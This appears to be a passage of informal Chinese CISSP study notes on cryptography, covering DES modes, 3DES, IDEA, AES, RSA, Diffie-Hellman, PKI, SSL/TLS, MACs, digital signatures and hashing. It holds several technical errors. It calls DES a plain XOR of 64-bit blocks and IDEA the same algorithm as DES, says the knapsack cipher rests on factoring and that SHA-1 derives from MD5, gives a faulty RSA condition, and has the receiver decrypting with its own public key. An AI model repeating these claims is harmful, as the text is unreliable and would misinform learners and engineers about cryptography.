①扰乱(混淆)指的是使密钥和密文之间的关系尽可能复杂,从而令攻击者无法从密文中 发现密钥。每个密文值都应依赖于密钥的若干部分,但在观察者看来,密钥值和密文值之间的 对应关系应当看上去是完全随机的。(算法很复杂) ②扩散(置乱)指的是单独一个明文位会影响到若干密文位。改变一个明文值应当更改许 多而不是一个密文值。实际上,在强分组密码中,如果改变一个明文位,那么每一个密文位都 会发生变化的几率为 50%。与扩散非常类似的一个概念叫做雪崩效应。如果一个算法非常符合 雪崩效应准则,这就意味着算法输入值的轻微变化会引起输出值的显著变化。即密钥或者明文 的少量变化会引起密文的显著变化。(结果很多样) ③SP-network。为了增强分组加密(块加密)算法的强度,替换 substitution 和置换 permutation 这 2 种方法都要用,反复用,以实现扰乱和扩散,这被称为 SP-network。 在算法中,将一个分组中的各个位打乱或者分散到整个分组内,即可实现扩散。扰乱则通 过执行复杂的替代函数来实现,这样坏人就无法了解如何替换正确的值以得到原始的明文消 息。假设我有 500 块上面写有字母的木块,将它们排列起来拼出一封电报(明文)。然后,我 使用另外 300 块木块替换其中 300 块木块(通过替代实现扰乱)。接下来,我将所有木块打乱(通 过换位实现扩散),并将它们堆成一堆。如果你想要得到原始的消息,那么就必须替换正确的 木块,并将它们接正确的顺序排列。这很难做到。 3.初始化向量 IV(Initialization Vector) IV 是一个随机值,用于确保加密过程中不会产生某种规律性的模式。它们与密钥一同使 用,而且在传输时不需要加密。如果不使用 IV,相同明文会得到相同的密文,攻击者可以轻 松破解密钥。 4.会话密钥(session key) 会话密钥是只使用一次的对称密钥,用于对通信会话期间两个用户之间的消息进行加密。 5 密码学在网络通信领域的应用 通信线路加密有两份种方式(IPsec 的 EAP 模式也有这 2 种通信方式): ①链路加密(Link encryption):建立 1 个安全隧道,所有的数据(包括头、尾、地址和 路由数据)被加密,路由每一跳都需要解密再加密转发,速度慢。 ③端到端加密(End-to-end encryption):不加密头、尾、地址和路由数据,速度快, 但易遭嗅探和窃听。 —81— 端到端加密的一个典型应用是 SSH(Secure Shell)安全外壳。SSH 为 FTP,Telnet,rlogin 等提供加密解决方案,有 2 个版本: SSH1,不安全,支持 DES, 3DES, IDEA,和 Blowfish 算法; SSH2,安全,不支持 DES/IDEA,支持其它算法。 6.通信线路加密的一个典型体系结构就是 IPsec IPSec 是由互联网工程任务组(IETF) 确立的标准体系结构,没规定技术实施的细节,是 一个开放的模块化架构,目的是实现实体(系统、路由器、网关、计算机等)之间的通信加密。 IPSec 使用公钥密码算法来提供加密、访问控制、不可否认性以及消息身份验证,使用 IP 协 议,被广泛应用于虚拟专用网(VPN)。 IPSec 通常与二层隧道协议(L2TP)一起使用,可以工作在两种模式:传输模式或隧道模式。 传输模式只有数据包有效载荷被加密,用于对等通信;隧道模式对整个数据包(包括头)都加密, 用于网关间通信。IPSec 有 2 个重要的组件: ①身份验证首部(AH)。提供消息完整性和不可否认性,提供身份验证和访问控制,并且可 以防止重放攻击。 ②封装安全有放载荷(ESP)。提供数据包内容的机密性和完整性。ESP 还提供加密和有限 的身份验证,并且可以防止重放攻击。 IPSec 另一个重要概念是安全关联(SA security association),SA 就是 1 个单向的通信 会话,并记录与连接有关的配置和状态信息。双向信道就有 2 个 SA,要同时支持 AH、ESP 就 要 4 个 SA。 IPSec 还有很多内容要考,详见第四域 C.4 章节。 7.网络安全关联和密钥管理协议(ISAKMP) The Internet Security Association and Key Management Protocol ISAKMP 是为 IPSec 提供后台支持的,主要功能是协商、建立、修改、删除和管理安全关 联(SA),具备 4 方面的主要能力: ①对通信主体(peer)进行身份验证。 ②建立并管理安全关联 SA。 ③提供密钥生成机制。 ④防止遭受威胁(例如重放和拒绝服务攻击)。 I.1 密码生命周期 (例如:加密的局限性、算法/协议治理) 除了一次一密,所有的密码系统都有一个有限的寿命。一方面,加密的数据是有保密期限 的,有的是 1 天,有的是 10 年,到期就可以公开了;另一方面,加密的算法、协议和密钥长 度随着技术的发展,很快就会过时,需要与时俱进。 业界一般用“强”、“弱化”和“遭破坏”等词来描述密码系统生命周期的各个阶段。NIST 以下几个词语描述算法和密钥长度的:“可接受”、“不宜使用”、“受限”、“没有用途”。 I.2 加密类型 (例如:对称加密、非对称加密、椭圆曲线加密) 一、对称密钥算法/对称加密/私有密钥/秘密密钥/单钥密码/共享密钥 common key —82— 消息的加密和解密使用相同的密钥,消息的发送者和接收者都要拥有这个密钥才行。凯撒 密码、斯巴达密码棒和恩尼格玛密码机等算法和系统都是对称算法的例子。接收者需要用加密 流程中使用过的同一个密钥来执行解密流程。 先解释一下“私钥”这个概念: 在对称密钥算法中,“私钥”指是的私有密钥密码学或公钥密码学,也就是对称加密的意 思,它的字面涵义是指收、发双方都要保守这个秘密(相同的密钥)。 在非对称密钥算法中,即所谓的公钥密码学,“私钥”是与“公钥”相对应的概念,是这 个密钥对中不公开给其它通信对象的密钥,它的字面涵义是指收、发双方仅要保守自己的这个 秘密(独有的私钥)就行了,不关其它人的事。 对称密码学运算很快,简单高效,可以集成到硬件里,但缺点是很明显的(考点): ①可扩展性差。它不能用于大量用户间的加密,因为每一对不同用户间的点对点通信加密 都要一个密钥,这个量很大,管理和分发这些密钥也很麻烦。N 个对象间要 N×(N-1)/2 个 不同的密钥。 ②密钥必须经常更新。如果 1 个人离职,不使用加密系统了,整个系统的密钥都要换掉, 不然就不安全了;就算没人走,也要经常换换,怕有人泄露密钥;而且分发密钥必须通过带外 安全途径。 ③不能实现不可否认性(抗抵赖性)。使用同一密钥的多个通信对象间,无法证实该消息 是由确认的某个对象发出来的,它不提供数字签名之类的功能。 下面是必须熟悉的对称加密算法: 1.数据加密标准(DES)Data Encryption Standard DES 是一种算法标准,DEA 是其具体实现,两个概念可以混用。美国 1977 年搞的 DES 已经 过时了,但它很精典,一直被优化升级。基本原理:明文按 64 位的长度逐段拆分,用 64 位的 字串来逐段异或(XOR),于是得到了密文。记住几个概念: DES 的分组长度是 64 位,密钥是 56 位!64 位字串中有 8 位是奇偶信息,不是密钥。加密、 解密要异或 16 次,1 次被称为是 1 轮(round),DES 为什么是 16 轮转换呢,开发者就这么定 的,他觉得这个够安全了,算的也快。不过可以很快被暴力破解。 下面是 DES 的 5 种操作模式(必考),也就是分组加密/块加密的方式: 前 2 种是在块结构中运行的;后 3 种是在流模式中运行的。 ①电子代码本模式(ECB)Electronic Codebook Mode,照本宣科 ECB 简单容易不安全,就是每个 64 字串都用相同密钥来运算,毫无变化。相同的明文会 得到相同的密文。搞得多了,破密者就可以搞出 64 位字串的明、密对照代码本了,不要密钥 也能解密。 这个脆弱性使得 ECB 仅能用于短代码的加密传输,用它来做主用通信加密手段并不现实 (因为长文本很容易被破密者归纳出明、密对照的代码本)。 ②密码分组链接模式(CBC)Cipher Block Chaining Mode,逐串变化 先用 1 个 64 位 IV(初始向量)来异或变换明文的第 1 个分组,再做 16 轮加密变换;后 续的分组都要用上一组的密文来先变换明文,再加密。这样相同明文不可能得到相同的密文。 CBC 用的 IV 可以明传给对方,也可以密传给对方。不过,如果加密过程中或传输过程中丢失 —83— 了一些字串,就不可能再解密了,环环相扣啊。 ③密码反馈模式(CFB)Cipher Feedback Mode,实时的逐串变化 CFB 就是 CBC,也用 IV 和链接,只是运算的方法不一样。(也有说 CFB 对 IV 加密了) 链接模式 CBC 在硬盘里算,把明文拆分,用 IV 逐个算出密文,明文、密文都存在硬盘上; 回馈模式 CFB 在内存里算,直接边算边发送,不用硬盘,它读明文的第 1 组 64 位,算完 发出去,接着读第 2 组,用上一组密文转换后再加密,接着发出去。因为算的很快,完全就是 个数据流。 CBC 就相当于是笔译,记下来翻译;CFB 就相当于同声翻译,边听边说,直接大脑反应。 ④输出反馈模式(OFB)Output Feedback Mode,容错的逐串变化(用的最多) OFB 就是 CFB,用 IV,运算方法一样,只是每个字串的明文变换不依赖上一个字串,而是通 过 IV 为每组字串都计算出一个种子值(seed value),再用这个种子值与对应字串做异或运 算,得到变换的明文后再加密。 输出回馈 OFB 在内存里算,因为 IV 是可以明传的,所以就算中间有丢包,也可以通过 IV、 密钥和字串序号来解密;但 CBC 和 CFB 的消息内容是密传的,每组字串的加密和解密都要依赖 上一组密文,一旦中间少了几串,就无法得知变换的 IV 到底是什么了,也就无法解密。 ⑤计数模式(CTR)Counter Mode,更快的容错的逐串变化 CTR 就是 OFB,用种子值的流密码运算,不过种子值不依赖上一个种子值,而是直接通过 字串的序号和 IV 来算出对应的种子值。这样算起来更快了,不用从第一个种子值一路推算到 第 N 个种子值,可以直接根据序号算出种子值来,好处是长文本的加密可以被拆分成很多个小 文来进行并行运算。CTR 用于 IPsec 和 ATM 等。 总结一下:懒得写了,自己归纳 5 种模式的特点吧,第 5 种是最好的。 2.三重数据加密算法(3DES) Triple DES DES 的 16 轮变换和 56 位密钥不够安全,现在计算机速度这么快,早就可以很快破解了。 完成可以再多变换几轮,可以用 2 到 3 个密钥甚至更多的密钥来搞好几个 DES 来回变换,把机 器都转晕了。这里要了解 4 种 3 重 DES 的方法: E 代表 1 次 16 轮的 DES 加密;数字代表密钥的个数;P 代表明文;C 代表密文;E(K,P)代 表用密钥 K 对 P 进行加密;D 代表解密。 ①DES-EEE3,C=E(K1,E(K2,E(K3,P))),有效密钥=56×3=168 位。看不懂就换个方 式表达:EEE3 就是用 3 个密钥分别加密 3 次。 ②DES-EDE3,C=E(K1,D(K2,E(K3,P))),与①一样,第二次是解密,不是加密。 ③DES-EEE2,C=E(K1,E(K2,E(K1,P))),与①一样,只用 2 个密钥,共 112 位。 ④DES-EDE2,C=E(K1,D(K2,E(K1,P))),与②一样,第二次解密,用 2 个密钥。 为什么用三重而不是两重 DES 呢,因为两重的加密强度与一重相比并没有提升(通过使用 中间相遇攻击)。 3.国际数据加密算法(IDEA) International Data Encryption Algorithm IDEA 的算法和 DES 是一样的,只是扩充了密钥的长度。它对 64 位字串进行异或(XOR) 和求模(MOD)操作,将 128 位密钥分解成 52 个 16 位密钥来用,可以使用 DES 的前四种转换 模式(分组加密运算方式),不能使用 CTR 模式。IDEA 最重要的应用就是 PGP(可靠隐私安全 —84— 电子邮件系统)。 PGP(Pretty Good Privacy)有两版本:商业版本使用 RSA 进行密钥交换,使用 IDEA 进 行加密/解密,使用 MD5 生成消息摘要;免费版本则使用 Diffie-Hellman 进行密钥交换,使用 Carlisle Adams/Stafford Tavares (CAST) 128 位算法进行加密/解密,使用 SHA-1 生成消息 摘要。 4.Blowfish Blowfish 比 IDEA 和 DES 更快,也是 64 位变换,还扩展了密钥的强度和灵活性,密钥长 度从 32 位到 448 位可变。它是公开免费的算法,用在 LINUX,美国政府没选择用它来代替 DES。 5.Skipjack 美国政府搞的 DES 算法,也是 64 位变换,但使用一个 80 位的密钥。 它支持并集成到 Clipper 和 Capstone 高速加密芯片中;最可怕的是它支持密钥托管, NIST 和财政部各管部分代码,在法律允许的情况下,美国政府可以随意解密。所以除了政府 强制,没人喜欢用它。 6.RC5 密码 Rivest Cipher 5 RC4 是对称加密,它更是一种流密码。RC4 算法本质上是一个由最长 256 密钥初始化的伪 随机数发生器(PRNG),其产生的密钥流与明文进行异或。它速度是最快的,但效率低,很快 被破解了,无线的 WEP 加密就用了它。它密钥长度可变,现在用于 SSL。 RC5 是 RSA 数据安全公司的商秘算法,收费的。RC5 就不是固定的对 64 位字串进行变换 了,它支持可变的字串长度(32、64、128 位)和可变的密钥长度(0-2048 位)和可选的加密 轮数(最多 255 轮)。 7.高级加密标准(AES) Advanced Encryption Standard 2000 年,美国总算搞出来 DES 的升级替代算法了,基于 Rijndael 算法。它采用密码块链 接消息认证码协议(CCMP)的计数器模式。商业部要求所有非政府的密级信息要用这个来加密, 它的特点就是有 3 种密钥长度和加密强度: 128 位密钥进行 10 轮加密;192 位 12 轮;256 位 14 轮(40 年可破)。 身为加密协议的 CCMP 是 802.lli 无线局域网标准的一个组成部分。CCMP 协议基于 AES, 其中 CRT 模式是它的加密算法。CBC-MAC(CCM)模式则用于消息完整性运算。 CCMP 中的 AES 处理必须使用 AES 128 位密钥、128 位数据块(分组)和一个 48 位的初始 向量 IV,且根据美国联邦信息处理标准,AES 算法(一种块密码)使用大小为 128 位的块,长度 为 128、192 和 256 位的密码密钥,运算轮数相对为 10、12 和 14 轮,CCMP 使用了 128 位密钥 和一个 48 位 IV,可以最大限度减少面对重放攻击的脆弱性。CTR 成分可以提供数据隐私保护。 密码块链接消息认证码成分产生了个消息完整性代码可为数据包有效载荷数据提供数据源认 证和数据完整性保护。802.lli 标准包含 CCMP。AES 常被 802.lli 称作加密协议,但 AES 本身 其实只是个块密码,加密协议实际上是 CCMP。 8.Twofish 算法/双鱼-2 个 64 位 Twofish 是另一种 AES ,处理 128 位的字串分组,使用最大 256 位的密钥。 Twofish 用了两种新技术:预白噪声化和后白噪声化(Prewhitening,Postwhitening), 是指用一个独立不同的子密钥来对文本进行变换,提高随机性;预白就是先对明文洗白白,后 —85— 白就是对最后的密文再洗白白。 总结:每种算法的字串分组长度和密钥长度是多少位、可不可变要自己去归纳记忆,虽然 书上有表格,自己不弄,记得不牢。 9.对称密钥的管理/密钥的带外分配 最后要讲一下对称加密最麻烦的事了:分发和管理密钥! 密钥的管理实践包括:密钥的生成、分发、存储、销毁、恢复和托管。其中: 存储密钥要注意两个问题:一是密钥别跟加密的数据存在一起,要另外保管;二是密钥别 完整的存储,要分给 2 个人各保管一半,这就是知识分离原则(split knowledge)(考点)。 10.密钥分配中心(KDC) 在 Kerberos 系统中,详见第五域 B.1 章节,用密钥分配中心 KDC 来管理密钥: ①第一种是主密钥,这是由每个用户和 KDC 共享的私钥。每个用户都有自己的主密钥,用 于加密用户与 KDC 之间的通信流。 ②第二种密钥是会话密钥,在需要时创建,在通信会话期间使用,会话结束后废弃。 11.密钥分发 重点讲对称密钥的 3 种分发方法: ①离线分发(Offline Distribution) 就是机要部门经常要干的注钥、换钥工作,将密钥载体通过物理连接直接注入到保密系统 或设备中;最大的缺陷就是密钥在运输过程中可能被截获。 ②公钥加密(Public Key Encryption) 许多通信者希望充分利用对称加密算法的速度优势,同时又能克服密钥分发过程中存在的 安全缺陷。方法就是:用公钥算法来验证身份、建立初始通信连接,并传送密钥;用私钥算法 来传送大量数据。一般情况下,私钥加密的速度比公钥快 1000 倍。 ③Diffie-Hellman 算法(非对称加密算法) 如果没有可靠的运输途径,没有合适的公钥基础架构,前面 2 种方法都不行。 Diffie-Hellman 算法就是密钥交换算法,它是非对称加密,基于离散对数难题 Discrete logarithms,也称为指数密钥协商 Exponential Key Agreement。它的基础是收发双方已经约 定了两个很大很大的,独有的,相当于密钥作用的数字;然后就可以放心的交换对称密钥了。 它的基本流程如下: 1.收发双方约定好 2 个很大很大的数字:质数 p 和整数 g,其中 1<g<p。 2.发方自己选一个随机的很大的整数 r;算出一个大 R,R=(gr ) MOD p。 3.收方自己选一个随机的很大的整数 s;算出一个在 S,S=(gs ) MOD p。 4.收发双方互换大 R 和大 S。 5.发方算出密钥 K=(Sr ) MOD p; 6.收方算出密钥 K=(Rs ) MOD p。 为什么两 K 算出来是一样的,我也没搞清楚。反正 K 就可以用作对称密钥了。 这个算法仅用于密钥协商即安全的发送密钥,并不提供数据加密和数字签名的功能。 二、非对称密钥算法/公钥密码学 Asymmetric Key Cryptography/Public Key —86— 每个人有 2 个密钥,称之为密钥对,即一个公钥、一个私钥;公钥是公开共享的,私钥是 自己独有的,加密和解密必须是一个公、一个私,或者一个私、一个公。这样解决了对称加密 算法的很多不足,带来的优点有: ①随意扩展。有多少用户,就需要多少对密钥,这个量是很少的,也好管理,人再多也不 怕。 ②密钥不用经常更新。每个人保护好自己的私钥就行了,如果离职了,就删除自己的密钥, 不影响其它人的加密,也不用换掉全部的密钥。密钥的分发管理也很简单,带内发送就行。 ③实现了不可否认性,还有完整性和身份验证。私钥还可以这么用:先对要发送的消息进 行散列运算(MD5 什么的),得到 1 个消息摘要;再用私钥对这个消息摘要进行加密,得到 1 个数字签名;然后把加密的消息、数字签名和公钥都发出去就行了;最后,接收者用它的公钥 解密消息得到消息明文,用公钥解密数字签名得到消息摘要明文,用散列运算得到接收文件的 消息摘要,对比一下消息摘要(散列值)是否一致,就知道这个消息是不是可靠的了。这里面, 消息摘要提供了完整性;数字签名提供了身份验证,也就是不可否认性。 对发送方来说,如果机密性很重要,那么他就会使用接收方的公钥来加密文件。因为只有 拥有相应私钥的人才能进行解密,这称为安全消息格式(secure message format)。 对发送方来说,如果身份验证很重要,那么他会使用自己的私钥来加密数据。这保证了只 有拥有该私钥的人才能加密这些数据,这称为公开消息格式(open message format)。 非对称加密最大的缺点就是运算很慢啊。如果要对大量的传输数据进行加密,最好结合两 份种方法:用非对称系统来建立通信连接,给对方发送 1 个对称系统用的共享密钥;再用对称 系统来加密随后进行的大数据通信。同时使用这两种技术称为混合方法(混合加密),也经常 被称为数字信封(digital envelope)。 下面是几典型的公钥算法: 1.RSA 最著名的、商业的公钥加密系统。基本原理是:大质数的因数分解很难很难,质数就是素 数。它的密钥对是这么算来的: 1.选 2 个很大很在的质数(200 位以上,比密钥还长)p 和 q,算出其乘积 n=p*q。 2.找出合适的数 e 和 d 分别用来生成公钥和私钥,其中: ①e<n,且 e 与(n-1)*(q-1)互质; ②d 满足(e*d-1) MOD (p-1)(q-1)=0 3.e 和 n 共同作为公钥,d 作为私钥;加解密过程如下: C=P e MOD n P=Cd MOD n 安全多用途互联网邮件扩展(S/MIME) 协议就使用 RSA 加密算法,并依靠 X.509 证书交换 密钥。S/MIME 还支持 AES 和 3DES 对称加密算法。它目前主要应用于桌面邮件应用程序,并 没用在 Web 电子邮件系统。(需要浏览器插件)。RSA 加密速度很慢,密钥长度一般为 2048 位。 攻击 RSA 算法的三种主要方法是: ①蛮力攻击,尝试所有可能的私钥。 ②数学攻击,因子分解两个质数的乘积。 —87— ③T 计时攻击,计量解密算法的运行时间。 2.背包算法 Merkle-Hellman / Merkle-Hellman Knapsack 与 RSA 一样,这种算法也基于因式分解操作的困难性,但是它依赖于被称为超增序列的集 合论组件,而不是依赖于大质数。它在 1984 年被破解了。 3. EI Gamal 算法 对称密码中的 Diffie-Hellman 算法使用大的整数和模数算法来安全交换私钥。1985 年, T.EI Garnal 博士利用这个原则开发了非对称密钥算法。它是公共免费的,不是商业收费的。 不过它最大的缺点是加密的密文长度比明文增加了 1 倍,如果是窄带传输大数据,这个算法显 然不适用。 4.椭圆曲线密码系统(ECC) Elliptic Curve Cryptosystem ECC 肯定会考的,它的数学原理很复杂,其基础是椭圆曲线的离散对数问题(ECDLP), 它比 RSA 的质数因数分解、以及 Diffie-Hellman 与 EI Gamal 的标准离散对数还要难。不过 不用了解那么细,知道大概就行了。记住 1024 位的 RSA 密钥强度相当于 160 位的椭圆曲线密 钥强度!它的速度明显比 RSA 快得多。 5.非对称密钥的管理 对称密钥分发很麻烦,那非对称密钥呢,不用操心怎么分发的,只要管好生成与使用环节 就行了。主要做法:选择公开的加密算法;确保密钥完成随机生成;选择合适的密钥长度;个 人必须管好自己的私钥;定期换钥;安全备份密钥。 I.3 公钥基础设施(PKI) 公钥加密系统的 1 个主要优点是可以验证对方的身份,使陌生双方之间的通信更可靠。 而受信任的公钥基础设施(PKI)是实现公钥加密系统的基本条件,它一般结合了非对称和 对称算法以及哈希(散列函数)和数字证书。很像公安制证中心管身份证。PKl 提供下列安全 服务:•机密性;•访问控制;完整性;•身份验证;•不可否认性。 1.证书 Certificates 数字证书(Certificates)不是数字签名(digital signature)。 数字签名可以证明 1 个信息是属于某个密钥对的; 数字证书可以证明这个密钥对是属于某个真实的人或机构的。 怎么证明呢?必须要有一个可信的证书颁发机构(CA)Certificate Authority 来发布被 认可的证书;你要想拥有证书,就必须带一堆资料去 CA 做实名验证和登记,这样 CA 才发布证 书来代表真实唯一的你。 数字证书的国际标准是 X.509(X.500 电子目录服务系列标准中的),它用在了 SSL 中, 它规定数字证书的数据包括以下内容: ①X.509 版本号;②序列号(CA 编号);③签名算法标识符;④发布者(CA);⑤有效期; ⑥证书主体(持有人的唯一名字);⑦主体的公钥。 这里插播一下 SSL: 安全套接字(SSL) Secure Sockets Layer 和安全传输层协议(TLS) Transport Layer Security(必考) —88— SSL 协议对访问网站的流量进行加密,使用 HTTPS 协议和 443 端口,实施过程如下: ①当用户访问网站时,通过浏览器检索 Web 服务器的证书,提取出服务器的公钥。 ②浏览器创建一个随机的对称密钥,使用服务器的公钥来加密,并发送给服务器。 ③服务器用自己的私钥解密得到对称密钥,然后双方使用对称密钥来实现加密通信。 而 TLS 则作为 SSL 标准的升级和替换,也使用 TCP 端口 443,由于误解,TLS 也被称为 SSL 3.1 版本,其实它和 SSL3.0 版不一样,也不再向下兼容了。详细内容在第四域的 C 和 C.3 章节都有。 下面是一些主要的证书授权机构 CA,不考,简单了解下吧: 赛门铁克 Symantec,Thawte,GeoTrust,GlobalSign,Comodo Limited,Starfield Technologies,GoDaddy,DigiCert,Network Solutions, LLC,Entrust 证书仅代表了 CA 是认可该主体的,现在已经有很多 CA 被拉黑名单了,因为他的证书花钱 就能买,乱搞。数字证书光有 CA(Certificate Authorities)生成并发布是不够的,证书要 在 CA 的数据库里注册了才有效,使用它的系统和人也要对遇到的各种证书进行验证才行,这 就用到了 RA(Registration Authorities)。CA 就是给你发本本的机构,RA 就是登记这个本 本相关信息的服务器。当其它系统要验证你时,就会上 RA 核对下你的证书本本。 证书路径确认(CPV)Certificate Path Validation(考点) CPV 指的是:证书链上的所有证书都是合法有效的,这个证书链包括从 CA 到 RA、服务器 到客户端、系统环境到三方系统的所有相关的证书。其中任一证书过期或被替换时,必须重新 验证整个证书链。证书是否过期,是否有效可以通过 2 种方式来核对证书撤销列表(CRLs, Certificate Revocation Lists): 证书的撤销都是 CA 要做的事,如果撤销了,就要通知大家:一是定期下载 CRLs;二是通 过联机证书状态协议(OCSP) The Online Certificate Status Protocol 实时验证。后者效率 更高,自动更新。 2.注册授权机构 RA RA 执行证书注册任务。RA 建立和确认个人的身份,代表终端用户启动使用 CA 的认证过 程,以及执行证书生命周期管理功能。RA 不能发行证书,但是可以作为用户和 CA 之间的中间 人。当需要新证书的时候..用户就会向 RA 发送请求,然后 RA 再将该请求发送给 CA。 3. PKI 步骤 ①终端用户注册自己,即获取一个数字证书的过程: (1)用户向 RA 发送一个请求。 (2)RA 向他索取特定的身份标识信息,如驾驶执照副本、电话号码、地址等。 (3)RA 接收并验证其身份标识信息,通过了就将用户的认证请求发送给 CA。 (4)CA 创建一个证书,该证书嵌入了用户的公钥及其身份信息(私钥/公钥对由 CA 或用户 的计算机在本地创建,这取决于系统的配置。如果由 CA 创建,那么就要通过安全的方式将私 钥发送给用户。在大多数情况下,用户会生成这个密钥对,然后在注册过程中发送他的公钥)。 ②终端用户与其它用户保密通信的过程: (5)用户从一个公共目录请求得到对方的公钥。 (6)这个目录(有时也称为存储库)将对方的公钥发送给用户。 —89— (7)用户验证数字证书并提取对方的公钥,并使用该公钥加密一个会话密钥,这个会话密 钥将用于加密他们之间传递的消息。然后将加密的会话密钥发送给对方,还要将自己的、包含 其公钥的证书也发送给对方。 (8)对方接收到用户的证书时,其浏览器会询问 CA 是否对该证书进行了数字签名。只有 对方的浏览器信任这个 CA,并且验证了证书,双方就可以进行加密通信了。 I.4 密钥管理实践 其实就是口令/密码管理。密钥的大小以及密钥的保密是实现密码系统安全的核心两个要 素。对称与非对称密钥的管理在上一章都讲过了。这里讲点别的: 1.XML 密钥管理规范 2.0(XKMS) XKMS 规范定义了分配和注册公钥的协议,适合于与 XML 数字签名和 XML 加密配套使用。 2.金融机构的标准 ANSI X9.17 标准用于金融机构的安全传输,特别描述了确保密钥保密性的手段。 3.职责分离 密钥不能一个人管,必须分开来。对于小公司,人员很少,可以采用其他补偿控制来达到 同样的控制目标,如:活动监测、审计跟踪和管理监督等。实现职责分离有 2 个重要机制:双 重控制和分割知识/知识分离。 ①双重控制 dual control。2 个或多人要同时一起来完成一个流程。(2 人同控) ②知识分离 split knowledge。密钥或资产要分发给不同的人来保管。(2 人分管) 4.密钥强度 RSA 数据安全公司指出: 1024 位 RSA 密钥等于 80 位对称密钥、 2048 位 RSA 密钥等于 112 位对称密钥、 3072 位 RSA 密钥等于 128 位对称密钥,2048 位密钥在 2030 年之前是够用的。 此外,1024 位的 RSA 密钥强度相当于 160 位的椭圆曲线密钥强度。 5.密钥丢了怎么办? M-N 方法:如果密钥涉及到 N 个人的利益,要想找回,必须要同时有最少 M 个人来操作。 M of N Control requires that a minimum number of agents (M) out of the total number of agents (N) work together to perform high‐security tasks. I.5 数字签名/(MAC) 公钥密码系统加上散列函数,就可以用来做数字签名了,数字签名要实现 2 个主要目标: ①确实证明了发送者的身份,具有不可否认性。(不可伪造) ②确实证明了消息没有改变,实现消息完整性。(没有篡改) I.2 的第二大点:非对称密钥学里已经讲过签名流程了,这里再描述一遍: 先对要发送的消息进行散列运算(SHA-512 什么的),得到 1 个消息摘要;再用私钥对这 个消息摘要进行加密,得到 1 个数字签名;然后把加密的消息、数字签名和公钥都发出去就行 了;最后,接收者用自己的公钥解密消息得到消息明文,用对方公钥解密数字签名得到消息摘 —90— 要明文,用散列运算得到接收文件的消息摘要,对比一下消息摘要(散列值)是否一致,就知 道这个消息是不是可靠的了。这里面,消息摘要提供了完整性;数字签名提供了身份验证,也 就是不可否认性。 这个过程也可以把消息明文发送出去,只加密消息摘要就行了,这样提供了身份验证,但 并没有保护信息隐私。数字签名也常用于软件下载分发、驱动程序什么的。 1.消息验证码/消息身份认证码(MAC) Message Authentication Code/(保护完整性) 消息验证码和散列函数(哈希)差不多,只不过多了身份认证和加密,可以防止被伪造。 为了防范中间人攻击,需要使用消息身份验证码 MAC,它对消息发送者的身份进行验证, 并不是对消息进行加密。MAC(亦称密码校验和)是用秘密密钥(对称加密)生成的一小块数据, 附着在消息上。当消息被接收时,接收者可以用私钥生成自己的 MAC,从而得以知道消息在传 输过程中是否曾被无意或有意改动过。MAC 这个词还有另外两个意思:强制身份认证、MAC 地 址。这里 MAC 有 3 种基本类型: ①散列信息身份验证代码(HMAC) Hashed Message Authentication Code 使用散列和共享密钥,验证完整性,提供数据源身份验证。 ②CBC-MAC。提供完整性验证、数据源身份验证,但是不提供机密性,并不加密数据。 ③CMAC。就是 CBC-MAC 的升级版,还是不加密数据,更复杂更安全。 也有分成 4 种类型的: ①无条件安全消息认证码 unconditionally secure MAC。基于一次一密本或一次性密钥。 ②基于散列函数的消息认证码 hash function-based MAC,HMAC。基于散列函数。 ③基于流密码的消息认证码 stream cipher-based MAC。基于流密码和线性反馈移位寄存 器 linear feedback shift registers,LFSRs 。 ④基于分组密码的消息认证码 block cipher-based MAC。将分组密码(DES-CBC)得到的 最后密文分组做为消息认证码。 —91— 2.正确使用密钥 *加密消息,使用接收者的公钥。 *解密消息,使用你自己的私钥。 *生成数字签名,用你自己的私钥。 *验证数字签名,用发送者的公钥。 3.数字签名标准(DSS)Digital Signature Standard 数字签名是指用户用自己的私钥对原始数据的哈希摘要(散列值)进行加密等到的数据。 接收者通过用对方的公钥解密数字签名,再对照原文的哈希值,就能实现完整性和身份验证(不 可抵赖性)了。 美国国家标准和技术协会在联邦信息处理标准(FIPS) 186-4 中指定了联邦政府可以使用 的数字签名算法,该标准也被称为数字签名标准(DSS)。标准规定美国政府的所有数字签名算 法都必须使用 SHA-2 散列函数;数字签名基础结构的加密算法可以三选一: ①数字签名算法(DSA),在(FIPS) 186-4 中指定。 ②RSA 算法,在 ANSIX 9.31 中指定。 ③椭圆曲线 DSA(ECDSA) ,在 ANSIX 9.62 中指定。 还有 2 种算法政府没认可,不过也要了解下: Schnorr’s 和 Nyberg-Rueppel’s 的签名算法。 —92— I.6 数字版权管理(DRM) 内嵌的标志或商标称为数字水印(digita1 watennark)。不同于将秘密消息嵌入图形以期 望不被发现,数字水印往往是可以看见的。数字水印的作用是阻止人们使用其他人的素材。这 种隐写术称为数字权利管理 DRM(Digita1 Righs Management),其目标是限制使用某家公司或 个人所拥有的素材。 1.隐写术和水印 Steganography and Watermarking 隐写术是使用密码学技术在另外一个消息内嵌入秘密消息的方法。通常做法:修改图像数 据中最不重要的数据比特,并不影响图像的浏览。隐写术也被用来做文档的水印。 I.7 抗抵赖 不可否认性/不可抵赖性/可问责性确保发送者无法否认自己发送了一条消息且消息的完 整性是原封不动的。不可抵赖性可通过数字签名和 PKI 实现。具体前面都讲了。 I.8 完整性(哈希法和加盐法)/散列 散列不是加密,是单向的数据转换,是把很长的消息转换成独一无二的一个很短的消息摘 要,这个摘要无法还原成消息的,就是用来验证消息是不是被篡改了,也用于实现数字签名。 术语“消息摘要”也被称为:散列、散列值、散列总数、CRC、指纹、校验和和数字 ID 等, 英文为:message digest 以及 hash,hash value,hash total,CRC,fingerprint,checksum,and digital ID。 消息摘要通常为 128 位,当然,数值越长,完整性验证就越可靠。按照 RSA 公司的标准, 散列函数应具备以下条件: ①广泛性:输入入值可以是任意长度。 ②确定性:输出值具有固定的长度,原文不变,散列就不变。 ③均匀性:散列计算容易实现,且不可预测。 ④难逆向:散列计算是单向的(无法)。 ⑤抗冲突/抗碰撞:散列值是唯一的(不同消息必须算出不同的散列值)。 最简单的散列算法就是将输入消息划分成大小固定的块,如 128 位,然后 XOR 每个块,就 得到 128 位的散列值。 下面是常用散列算法: 1. SHA(常用) NIST 开发的 SHA,SHA-1 和 SHA-2 都会考到。SHA 基于 MD4,SHA-1 基于 MD5, ①SHA-1:输入值可以是任意长度(小于 2 64 =2097152T);消息摘要长度 160 位;它将消 息原文拆分为 512 位的分组的处理,如果长度不够多就填充一些附加的消息。 ②SHA-2:SHA-1 已经被发现存在缺陷,SHA-2 就出现了,它有 4 种形式: *SHA-256,处理 512 比特的分组大小,生成 256 比特的消息摘要。 *SHA-224,处理 512 